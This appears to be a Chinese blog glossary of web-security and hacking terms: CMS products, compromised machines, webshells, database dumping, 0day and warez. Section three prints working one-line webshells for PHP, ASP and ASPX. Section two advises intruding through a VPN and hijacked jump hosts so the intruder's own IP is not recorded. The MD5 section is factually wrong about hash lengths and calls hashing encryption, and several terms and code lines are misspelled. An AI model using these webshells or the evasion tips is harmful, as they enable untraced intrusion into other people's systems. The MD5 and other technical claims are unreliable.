web安全的一些专业术语介绍

一、CMS(B/S)

CMS是网站内容管理系统。简单点说，我们做网站，一般是去网上下载一些源码，然后自己修改，别人写好的，这样是有后台的，别人可以去登入去管理。这样的源码，就叫CMS。常见的cms有dedecms,dz，南方等等。
医院常用的CMS:之梦
教育常用的CMS:之梦
博客类型网站常用的CMS：Wordpress
1、动易CMS系统主要用于小型网站和个人网站。
2、酷源CMS:
酷源科技主要运营的产品有：KYCMS网站内容管理系统、B2B多用户商城系统、在线考试系统、子网站集群系统、酷源OA网络协同办公系统等。
酷源科技主要用户群体：个人网站、企事业单位网站、集团公司、政府单位、校园等。
3、YulinCMS (雨林内容管理系统) 是采用微软的.net技术进行架构、功能强大的网站管理软件
4、泽元CMS主要用于自助建站系统和大中型网站
5、dedeCMS是php+mysql的，大多数用户是个人站长。
6、闪睿企业网站管理系统是一套针对企业的网站内容管理系统。他高效、智能、友好易用。
7、锐商企业CMS (COMSHARP CMS) 主要面向企业网站市场，以简洁稳重著称
8、FOOSUN (风讯内容管理系统)包括信息采集、整理、分类、审核、发布和管理的全过程，具备完善的信息管理和发布管理功能，是企事业单位网站、内部网站和各类ICP网站内容管理和维护的理想工具。应用该系统，政府各部门可以随时方便地提交需要发布的信息而无须掌握复杂的技术；FoosunCMS已成为国产CMS“第一品牌”。

更加详细的介绍请看这篇博客https://blog.csdn.net/iteye_18879/article/details/81556360

二、肉鸡、抓鸡、跳板

肉鸡：被控制的电脑
抓鸡：你控制被人电脑的一个过程
跳板：如果你直接入侵别人电脑，就会记录你自己的IP。但是我用自己电脑控制的另一台电脑去入侵别人电脑，那么记录的就是另一台电脑的IP,那么这台电脑就是跳板
自己电脑要挂个VPN去连接肉鸡（跳板），然后去入侵（这种方式较安全）

三、一句话、小马、大马/webshell

1、一句话木马：
php:<?php eval($_POST["kxc"]);?>
asp:<% eval request("kxc") %> 或 <%execute(request("kxc"))%>
asxp:<%@ Page Lanuage="Jscript"%><%eval(Request.Item["kxc"])%>
一句话木马本身是没有危害的，关键在于我们传的参数。

小马是用来上传大马的。

它们都是webshall

四、webshell、提权

1、webshell其实就是网站后门.

2、提权就是提升权限的一个过程

五、MD5

加密算法，MD5加密后一般是哈希值（可能是16位或者36位），如果是20位，要去掉前3和最后一位

六、源码打包、脱裤

1、源码打包就是把整个网站的源码打包下来
2、脱裤就是整个数据库的敏感信息拖出来
黑客脱裤一般是拖user表

七、嗅探、rookit

1、嗅探：抓包分析数据包

2、rookit:隐藏级系统后面

八、“0Day”和“Warez”

其实0Day和Warez一直以来并没有一个确切的定义，这边就简单说下

0Day:“0Day”只是指在最短的时间内“破解”（并不强调当天破解），并在网上发布。

Warez:“Warez”就是“上传到网上让其它人免费下载的完全版软件”的意思。“Ware”来自于“SoftWare”，而之所以结尾加“z”而不加“s”（在英语中，名词后面加“s”表示复数形式，指很多东西），是因为加“z”的读音和“s”类似，但是看起来却完全不同——正如常见的英文名字写法应该是首字母大写，比如“Robbins”，黑客或者破解者们就偏偏喜欢写成“rOBBiNS”，将大小写颠倒以显得自己很另类，很“酷”。
　　所以，这个世界上其实并不存在某个叫做“Warez”或者“0Day”的组织，只是不断有人发布“0Day”和“Warez”罢了。